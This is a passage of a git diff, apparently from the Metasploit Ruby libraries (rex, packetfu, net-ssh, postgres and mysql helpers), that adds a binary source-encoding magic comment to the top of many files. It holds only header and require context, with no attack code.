index 02b0d9cc8a..4d96c16f44 100644
--- a/lib/net/ssh/transport/server_version.rb
+++ b/lib/net/ssh/transport/server_version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/loggable'
require 'net/ssh/version'
diff --git a/lib/net/ssh/transport/session.rb b/lib/net/ssh/transport/session.rb
index 55e846a076..d78f12b811 100644
--- a/lib/net/ssh/transport/session.rb
+++ b/lib/net/ssh/transport/session.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'timeout'
diff --git a/lib/net/ssh/transport/state.rb b/lib/net/ssh/transport/state.rb
index 2d8a3ddaa9..165f0cce95 100644
--- a/lib/net/ssh/transport/state.rb
+++ b/lib/net/ssh/transport/state.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'zlib'
require 'net/ssh/transport/cipher_factory'
require 'net/ssh/transport/hmac'
diff --git a/lib/net/ssh/utils.rb b/lib/net/ssh/utils.rb
index 2af30837b8..f6af0f45b5 100644
--- a/lib/net/ssh/utils.rb
+++ b/lib/net/ssh/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh'
require 'rex'
diff --git a/lib/net/ssh/utils.rb.ut.rb b/lib/net/ssh/utils.rb.ut.rb
index 5aa3c44f4e..839684a94c 100644
--- a/lib/net/ssh/utils.rb.ut.rb
+++ b/lib/net/ssh/utils.rb.ut.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh'
require 'test/unit'
diff --git a/lib/net/ssh/verifiers/lenient.rb b/lib/net/ssh/verifiers/lenient.rb
index 5026550753..9ac6143846 100644
--- a/lib/net/ssh/verifiers/lenient.rb
+++ b/lib/net/ssh/verifiers/lenient.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/verifiers/strict'
module Net; module SSH; module Verifiers
diff --git a/lib/net/ssh/verifiers/null.rb b/lib/net/ssh/verifiers/null.rb
index d88afb9968..313159503c 100644
--- a/lib/net/ssh/verifiers/null.rb
+++ b/lib/net/ssh/verifiers/null.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH; module Verifiers
# The Null host key verifier simply allows every key it sees, without
diff --git a/lib/net/ssh/verifiers/strict.rb b/lib/net/ssh/verifiers/strict.rb
index ed7e8abe03..5e16248ac4 100644
--- a/lib/net/ssh/verifiers/strict.rb
+++ b/lib/net/ssh/verifiers/strict.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'net/ssh/errors'
require 'net/ssh/known_hosts'
diff --git a/lib/net/ssh/version.rb b/lib/net/ssh/version.rb
index 3e677fb9e3..be54251d0b 100644
--- a/lib/net/ssh/version.rb
+++ b/lib/net/ssh/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Net; module SSH
# A class for describing the current version of a library. The version
# consists of three parts: the +major+ number, the +minor+ number, and the
diff --git a/lib/packetfu.rb b/lib/packetfu.rb
index 86bb6e0bb2..e87b02f46f 100644
--- a/lib/packetfu.rb
+++ b/lib/packetfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
end
require 'packetfu/packetfu'
diff --git a/lib/packetfu/packetfu.rb b/lib/packetfu/packetfu.rb
index 744a87e589..5bf29b0f40 100644
--- a/lib/packetfu/packetfu.rb
+++ b/lib/packetfu/packetfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# :title: PacketFu Documentation
# :main: README
diff --git a/lib/packetfu/packetfu/capture.rb b/lib/packetfu/packetfu/capture.rb
index 5aa6594692..137b1b5781 100644
--- a/lib/packetfu/packetfu/capture.rb
+++ b/lib/packetfu/packetfu/capture.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# The Capture class is used to construct PcapRub objects in order to collect
diff --git a/lib/packetfu/packetfu/config.rb b/lib/packetfu/packetfu/config.rb
index 98ebd5958b..3c816e1d5c 100644
--- a/lib/packetfu/packetfu/config.rb
+++ b/lib/packetfu/packetfu/config.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# The Config class holds various bits of useful default information
diff --git a/lib/packetfu/packetfu/inject.rb b/lib/packetfu/packetfu/inject.rb
index 74d70fea09..19114a8522 100644
--- a/lib/packetfu/packetfu/inject.rb
+++ b/lib/packetfu/packetfu/inject.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# The Inject class handles injecting arrays of binary data on the wire.
diff --git a/lib/packetfu/packetfu/packet.rb b/lib/packetfu/packetfu/packet.rb
index e04140d6fc..86c77bf9ff 100644
--- a/lib/packetfu/packetfu/packet.rb
+++ b/lib/packetfu/packetfu/packet.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# Packet is the parent class of EthPacket, IPPacket, UDPPacket, TCPPacket, and all
diff --git a/lib/packetfu/packetfu/pcap.rb b/lib/packetfu/packetfu/pcap.rb
index b84ab994d4..fa783ab6df 100644
--- a/lib/packetfu/packetfu/pcap.rb
+++ b/lib/packetfu/packetfu/pcap.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module StructFu
diff --git a/lib/packetfu/packetfu/protos/arp.rb b/lib/packetfu/packetfu/protos/arp.rb
index a238e71422..3145fff40a 100644
--- a/lib/packetfu/packetfu/protos/arp.rb
+++ b/lib/packetfu/packetfu/protos/arp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# ARPHeader is a complete ARP struct, used in ARPPacket.
diff --git a/lib/packetfu/packetfu/protos/eth.rb b/lib/packetfu/packetfu/protos/eth.rb
index 84a5eb4daa..6e8f6f7dd3 100644
--- a/lib/packetfu/packetfu/protos/eth.rb
+++ b/lib/packetfu/packetfu/protos/eth.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# EthOui is the Organizationally Unique Identifier portion of a MAC address, used in EthHeader.
diff --git a/lib/packetfu/packetfu/protos/hsrp.rb b/lib/packetfu/packetfu/protos/hsrp.rb
index 24a2d85952..c763568a2c 100644
--- a/lib/packetfu/packetfu/protos/hsrp.rb
+++ b/lib/packetfu/packetfu/protos/hsrp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# HSRPHeader is a complete HSRP struct, used in HSRPPacket. HSRP is typically used for
diff --git a/lib/packetfu/packetfu/protos/icmp.rb b/lib/packetfu/packetfu/protos/icmp.rb
index 5860eb649a..943471d82e 100644
--- a/lib/packetfu/packetfu/protos/icmp.rb
+++ b/lib/packetfu/packetfu/protos/icmp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# ICMPHeader is a complete ICMP struct, used in ICMPPacket. ICMP is
diff --git a/lib/packetfu/packetfu/protos/invalid.rb b/lib/packetfu/packetfu/protos/invalid.rb
index d63de22834..9630287842 100644
--- a/lib/packetfu/packetfu/protos/invalid.rb
+++ b/lib/packetfu/packetfu/protos/invalid.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# InvalidHeader catches all packets that we don't already have a Struct for,
diff --git a/lib/packetfu/packetfu/protos/ip.rb b/lib/packetfu/packetfu/protos/ip.rb
index d524d43dd7..4c503644ae 100644
--- a/lib/packetfu/packetfu/protos/ip.rb
+++ b/lib/packetfu/packetfu/protos/ip.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'ipaddr'
module PacketFu
diff --git a/lib/packetfu/packetfu/protos/ipv6.rb b/lib/packetfu/packetfu/protos/ipv6.rb
index d8b97dee64..035aaa1728 100644
--- a/lib/packetfu/packetfu/protos/ipv6.rb
+++ b/lib/packetfu/packetfu/protos/ipv6.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# AddrIpv6 handles addressing for IPv6Header
diff --git a/lib/packetfu/packetfu/protos/tcp.rb b/lib/packetfu/packetfu/protos/tcp.rb
index 06f3eec48b..3eb8d40a69 100644
--- a/lib/packetfu/packetfu/protos/tcp.rb
+++ b/lib/packetfu/packetfu/protos/tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# Implements the Explict Congestion Notification for TCPHeader.
diff --git a/lib/packetfu/packetfu/protos/udp.rb b/lib/packetfu/packetfu/protos/udp.rb
index 685da19d5a..1ecff551cd 100644
--- a/lib/packetfu/packetfu/protos/udp.rb
+++ b/lib/packetfu/packetfu/protos/udp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# UDPHeader is a complete UDP struct, used in UDPPacket. Many Internet-critical protocols
diff --git a/lib/packetfu/packetfu/structfu.rb b/lib/packetfu/packetfu/structfu.rb
index aa7d58aec4..d12ddfbfef 100644
--- a/lib/packetfu/packetfu/structfu.rb
+++ b/lib/packetfu/packetfu/structfu.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# StructFu, a nifty way to leverage Ruby's built in Struct class
# to create meaningful binary data.
diff --git a/lib/packetfu/packetfu/utils.rb b/lib/packetfu/packetfu/utils.rb
index b1e3d93fea..51574da435 100644
--- a/lib/packetfu/packetfu/utils.rb
+++ b/lib/packetfu/packetfu/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
module PacketFu
diff --git a/lib/packetfu/packetfu/version.rb b/lib/packetfu/packetfu/version.rb
index 8d2e08d76c..3f2b6c1992 100644
--- a/lib/packetfu/packetfu/version.rb
+++ b/lib/packetfu/packetfu/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module PacketFu
# Check the repo's for version release histories
diff --git a/lib/postgres/binary_reader.rb b/lib/postgres/binary_reader.rb
index a5c7ec7449..0d0611e393 100644
--- a/lib/postgres/binary_reader.rb
+++ b/lib/postgres/binary_reader.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
require 'postgres/byteorder'
diff --git a/lib/postgres/binary_writer.rb b/lib/postgres/binary_writer.rb
index e8d2579452..d0f478204f 100644
--- a/lib/postgres/binary_writer.rb
+++ b/lib/postgres/binary_writer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
require 'postgres/byteorder'
diff --git a/lib/postgres/buffer.rb b/lib/postgres/buffer.rb
index 1c5f988fd6..75d14bc91c 100644
--- a/lib/postgres/buffer.rb
+++ b/lib/postgres/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
require 'postgres/binary_writer'
require 'postgres/binary_reader'
diff --git a/lib/postgres/byteorder.rb b/lib/postgres/byteorder.rb
index f12c54dacc..b8c51528c3 100644
--- a/lib/postgres/byteorder.rb
+++ b/lib/postgres/byteorder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'postgres_msf'
# Namespace for Metasploit branch.
diff --git a/lib/postgres/postgres-pr/connection.rb b/lib/postgres/postgres-pr/connection.rb
index 68210bd30c..db8cc2d962 100644
--- a/lib/postgres/postgres-pr/connection.rb
+++ b/lib/postgres/postgres-pr/connection.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# Author:: Michael Neumann
# Copyright:: (c) 2005 by Michael Neumann
diff --git a/lib/postgres/postgres-pr/message.rb b/lib/postgres/postgres-pr/message.rb
index 781d595071..643b688cdd 100644
--- a/lib/postgres/postgres-pr/message.rb
+++ b/lib/postgres/postgres-pr/message.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# Author:: Michael Neumann
# Copyright:: (c) 2005 by Michael Neumann
diff --git a/lib/postgres/postgres-pr/postgres-compat.rb b/lib/postgres/postgres-pr/postgres-compat.rb
index 52c44b3990..42618ebefc 100644
--- a/lib/postgres/postgres-pr/postgres-compat.rb
+++ b/lib/postgres/postgres-pr/postgres-compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# This is a compatibility layer for using the pure Ruby postgres-pr instead of
# the C interface of postgres.
diff --git a/lib/postgres/postgres-pr/typeconv/array.rb b/lib/postgres/postgres-pr/typeconv/array.rb
index 235d545220..dd4ee749fc 100644
--- a/lib/postgres/postgres-pr/typeconv/array.rb
+++ b/lib/postgres/postgres-pr/typeconv/array.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'strscan'
module Postgres::Conversion
diff --git a/lib/postgres/postgres-pr/typeconv/bytea.rb b/lib/postgres/postgres-pr/typeconv/bytea.rb
index 7c43ac9e54..ca9128fc9f 100644
--- a/lib/postgres/postgres-pr/typeconv/bytea.rb
+++ b/lib/postgres/postgres-pr/typeconv/bytea.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Postgres::Conversion
#
diff --git a/lib/postgres/postgres-pr/typeconv/conv.rb b/lib/postgres/postgres-pr/typeconv/conv.rb
index c2f9ee0899..8402b22e95 100644
--- a/lib/postgres/postgres-pr/typeconv/conv.rb
+++ b/lib/postgres/postgres-pr/typeconv/conv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Postgres
module Conversion
class ConversionError < Exception; end
diff --git a/lib/postgres/postgres-pr/version.rb b/lib/postgres/postgres-pr/version.rb
index 821fb8f375..52fdc52816 100644
--- a/lib/postgres/postgres-pr/version.rb
+++ b/lib/postgres/postgres-pr/version.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Namespace for Metasploit branch.
module Msf
module Db
diff --git a/lib/postgres_msf.rb b/lib/postgres_msf.rb
index 8a89767a64..7f2ece6d7b 100644
--- a/lib/postgres_msf.rb
+++ b/lib/postgres_msf.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# "Pure Ruby PostgreSQL interface," also known as "Postgres-PR" is:
# Copyright (c) 2005, 2008 by Michael Neumann (mneumann@ntecs.de).
#
diff --git a/lib/postgres_msf.rb.ut.rb b/lib/postgres_msf.rb.ut.rb
index d4080f0e99..5feff33349 100644
--- a/lib/postgres_msf.rb.ut.rb
+++ b/lib/postgres_msf.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'test/unit'
require 'postgres_msf'
diff --git a/lib/rbmysql.rb b/lib/rbmysql.rb
index 9d7eead42c..68f2fbdf69 100644
--- a/lib/rbmysql.rb
+++ b/lib/rbmysql.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008-2009 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/charset.rb b/lib/rbmysql/charset.rb
index a285ceb412..d52b6c50a8 100644
--- a/lib/rbmysql/charset.rb
+++ b/lib/rbmysql/charset.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/compat.rb b/lib/rbmysql/compat.rb
index 025be22f58..3df7441201 100644
--- a/lib/rbmysql/compat.rb
+++ b/lib/rbmysql/compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/constants.rb b/lib/rbmysql/constants.rb
index bdbc798693..5b6c1713e7 100644
--- a/lib/rbmysql/constants.rb
+++ b/lib/rbmysql/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2003-2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/error.rb b/lib/rbmysql/error.rb
index 5f6cef1f69..bf3b5d56ad 100644
--- a/lib/rbmysql/error.rb
+++ b/lib/rbmysql/error.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2003-2008 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbmysql/protocol.rb b/lib/rbmysql/protocol.rb
index 641a39d690..243cb094d6 100644
--- a/lib/rbmysql/protocol.rb
+++ b/lib/rbmysql/protocol.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (C) 2008-2009 TOMITA Masahiro
# mailto:tommy@tmtm.org
diff --git a/lib/rbreadline.rb b/lib/rbreadline.rb
index dfccf9dfe6..1597ec0072 100644
--- a/lib/rbreadline.rb
+++ b/lib/rbreadline.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# rbreadline.rb -- a general facility for reading lines of input
# with emacs style editing and completion.
diff --git a/lib/rex/arch.rb b/lib/rex/arch.rb
index 5863f8ae78..bd6699d803 100644
--- a/lib/rex/arch.rb
+++ b/lib/rex/arch.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/constants'
module Rex
diff --git a/lib/rex/arch/sparc.rb b/lib/rex/arch/sparc.rb
index 827e41b746..1720aed6d5 100644
--- a/lib/rex/arch/sparc.rb
+++ b/lib/rex/arch/sparc.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Arch
diff --git a/lib/rex/arch/sparc.rb.ut.rb b/lib/rex/arch/sparc.rb.ut.rb
index 92bac960bb..bbe953fcab 100644
--- a/lib/rex/arch/sparc.rb.ut.rb
+++ b/lib/rex/arch/sparc.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/arch/x86.rb b/lib/rex/arch/x86.rb
index 98598a01e5..16671ca21f 100644
--- a/lib/rex/arch/x86.rb
+++ b/lib/rex/arch/x86.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Arch
diff --git a/lib/rex/arch/x86.rb.ut.rb b/lib/rex/arch/x86.rb.ut.rb
index 7b1bb63265..de1f0292d0 100644
--- a/lib/rex/arch/x86.rb.ut.rb
+++ b/lib/rex/arch/x86.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/assembly/nasm.rb b/lib/rex/assembly/nasm.rb
index 281ac48d1f..c2c35d6859 100644
--- a/lib/rex/assembly/nasm.rb
+++ b/lib/rex/assembly/nasm.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'tempfile'
require 'rex/file'
diff --git a/lib/rex/assembly/nasm.rb.ut.rb b/lib/rex/assembly/nasm.rb.ut.rb
index a6579e01df..a4c4f27c6f 100644
--- a/lib/rex/assembly/nasm.rb.ut.rb
+++ b/lib/rex/assembly/nasm.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb
index f45b753503..cd01eb7072 100644
--- a/lib/rex/compat.rb
+++ b/lib/rex/compat.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/constants.rb b/lib/rex/constants.rb
index 58b0f020e6..c6a3958297 100644
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# Log severities
#
diff --git a/lib/rex/elfparsey.rb b/lib/rex/elfparsey.rb
index fc4aabc00d..a9f891066a 100644
--- a/lib/rex/elfparsey.rb
+++ b/lib/rex/elfparsey.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfparsey/elf.rb b/lib/rex/elfparsey/elf.rb
index c673d1e6d7..9d9811f6d5 100644
--- a/lib/rex/elfparsey/elf.rb
+++ b/lib/rex/elfparsey/elf.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfparsey/elfbase.rb b/lib/rex/elfparsey/elfbase.rb
index 4fa430b715..be5691e2d8 100644
--- a/lib/rex/elfparsey/elfbase.rb
+++ b/lib/rex/elfparsey/elfbase.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfparsey/exceptions.rb b/lib/rex/elfparsey/exceptions.rb
index cfd84c2e57..4e3804424f 100644
--- a/lib/rex/elfparsey/exceptions.rb
+++ b/lib/rex/elfparsey/exceptions.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfscan.rb b/lib/rex/elfscan.rb
index a1113b16d2..d3e66affbc 100644
--- a/lib/rex/elfscan.rb
+++ b/lib/rex/elfscan.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfscan/scanner.rb b/lib/rex/elfscan/scanner.rb
index eaaae51596..115aa0977d 100644
--- a/lib/rex/elfscan/scanner.rb
+++ b/lib/rex/elfscan/scanner.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/elfscan/search.rb b/lib/rex/elfscan/search.rb
index 509257f0f2..80f7be017c 100644
--- a/lib/rex/elfscan/search.rb
+++ b/lib/rex/elfscan/search.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
diff --git a/lib/rex/encoder/alpha2.rb b/lib/rex/encoder/alpha2.rb
index 3db46b0996..3a10e9abac 100644
--- a/lib/rex/encoder/alpha2.rb
+++ b/lib/rex/encoder/alpha2.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# ________________________________________________________________________________
diff --git a/lib/rex/encoder/alpha2/alpha_mixed.rb b/lib/rex/encoder/alpha2/alpha_mixed.rb
index d7b421c09c..cc35c1a2b5 100644
--- a/lib/rex/encoder/alpha2/alpha_mixed.rb
+++ b/lib/rex/encoder/alpha2/alpha_mixed.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/alpha2/alpha_upper.rb b/lib/rex/encoder/alpha2/alpha_upper.rb
index e510c10b0e..0cb12c0e1a 100644
--- a/lib/rex/encoder/alpha2/alpha_upper.rb
+++ b/lib/rex/encoder/alpha2/alpha_upper.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/alpha2/generic.rb b/lib/rex/encoder/alpha2/generic.rb
index e775a786e6..13833d10e4 100644
--- a/lib/rex/encoder/alpha2/generic.rb
+++ b/lib/rex/encoder/alpha2/generic.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/text'
diff --git a/lib/rex/encoder/alpha2/unicode_mixed.rb b/lib/rex/encoder/alpha2/unicode_mixed.rb
index 80db0b3423..999a2d25fe 100644
--- a/lib/rex/encoder/alpha2/unicode_mixed.rb
+++ b/lib/rex/encoder/alpha2/unicode_mixed.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/alpha2/unicode_upper.rb b/lib/rex/encoder/alpha2/unicode_upper.rb
index d3934b2d7a..2e062bce34 100644
--- a/lib/rex/encoder/alpha2/unicode_upper.rb
+++ b/lib/rex/encoder/alpha2/unicode_upper.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/alpha2/generic'
diff --git a/lib/rex/encoder/ndr.rb b/lib/rex/encoder/ndr.rb
index 3f7a2c0168..99331ed79f 100644
--- a/lib/rex/encoder/ndr.rb
+++ b/lib/rex/encoder/ndr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require "rex/text"
module Rex
diff --git a/lib/rex/encoder/ndr.rb.ut.rb b/lib/rex/encoder/ndr.rb.ut.rb
index b4034cc673..4c425e8345 100644
--- a/lib/rex/encoder/ndr.rb.ut.rb
+++ b/lib/rex/encoder/ndr.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/encoder/nonalpha.rb b/lib/rex/encoder/nonalpha.rb
index cc6927768f..8cff4190fe 100644
--- a/lib/rex/encoder/nonalpha.rb
+++ b/lib/rex/encoder/nonalpha.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/text'
diff --git a/lib/rex/encoder/nonupper.rb b/lib/rex/encoder/nonupper.rb
index ab2bed2de6..d7a598620a 100644
--- a/lib/rex/encoder/nonupper.rb
+++ b/lib/rex/encoder/nonupper.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/text'
diff --git a/lib/rex/encoder/xdr.rb b/lib/rex/encoder/xdr.rb
index 17e2ddcd43..7ba2f29dcf 100644
--- a/lib/rex/encoder/xdr.rb
+++ b/lib/rex/encoder/xdr.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Encoder
diff --git a/lib/rex/encoder/xdr.rb.ut.rb b/lib/rex/encoder/xdr.rb.ut.rb
index 3c982276ab..01e1666a5e 100644
--- a/lib/rex/encoder/xdr.rb.ut.rb
+++ b/lib/rex/encoder/xdr.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/encoder/xor.rb b/lib/rex/encoder/xor.rb
index 5474e92465..e78a824919 100644
--- a/lib/rex/encoder/xor.rb
+++ b/lib/rex/encoder/xor.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Encoder
diff --git a/lib/rex/encoder/xor/dword.rb b/lib/rex/encoder/xor/dword.rb
index 3bfb29baa7..b94a9ea3d8 100644
--- a/lib/rex/encoder/xor/dword.rb
+++ b/lib/rex/encoder/xor/dword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/xor'
require 'rex/encoding/xor/dword'
diff --git a/lib/rex/encoder/xor/dword_additive.rb b/lib/rex/encoder/xor/dword_additive.rb
index b63f9df198..02ff7ce62b 100644
--- a/lib/rex/encoder/xor/dword_additive.rb
+++ b/lib/rex/encoder/xor/dword_additive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/xor'
require 'rex/encoding/xor/dword_additive'
diff --git a/lib/rex/encoders/xor_dword.rb b/lib/rex/encoders/xor_dword.rb
index 70b8d885c5..7039c0dca6 100644
--- a/lib/rex/encoders/xor_dword.rb
+++ b/lib/rex/encoders/xor_dword.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/arch/x86'
require 'rex/encoder/xor/dword'
diff --git a/lib/rex/encoders/xor_dword_additive.rb b/lib/rex/encoders/xor_dword_additive.rb
index a6ef4b5866..0c687f5a14 100644
--- a/lib/rex/encoders/xor_dword_additive.rb
+++ b/lib/rex/encoders/xor_dword_additive.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoder/xor/dword_additive'
diff --git a/lib/rex/encoders/xor_dword_additive.rb.ut.rb b/lib/rex/encoders/xor_dword_additive.rb.ut.rb
index f71a470cdd..b54737283f 100644
--- a/lib/rex/encoders/xor_dword_additive.rb.ut.rb
+++ b/lib/rex/encoders/xor_dword_additive.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'dev', 'machinetest'))
diff --git a/lib/rex/encoding/xor.rb b/lib/rex/encoding/xor.rb
index 502e5800f5..e25664aac9 100644
--- a/lib/rex/encoding/xor.rb
+++ b/lib/rex/encoding/xor.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# make sure the namespace is created
diff --git a/lib/rex/encoding/xor.rb.ts.rb b/lib/rex/encoding/xor.rb.ts.rb
index 85d34c080e..211fd64983 100644
--- a/lib/rex/encoding/xor.rb.ts.rb
+++ b/lib/rex/encoding/xor.rb.ts.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/encoding/xor/byte.rb b/lib/rex/encoding/xor/byte.rb
index a72ae4ca2a..809c0b0aea 100644
--- a/lib/rex/encoding/xor/byte.rb
+++ b/lib/rex/encoding/xor/byte.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/encoding/xor/generic'
diff --git a/lib/rex/encoding/xor/byte.rb.ut.rb b/lib/rex/encoding/xor/byte.rb.ut.rb
index 902d351b53..8259a7c993 100644
--- a/lib/rex/encoding/xor/byte.rb.ut.rb
+++ b/lib/rex/encoding/xor/byte.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/encoding/xor/dword.rb b/lib/rex/encoding/xor/dword.rb
index f4bea0b2af..212ca33b57 100644
--- a/lib/rex/encoding/xor/dword.rb
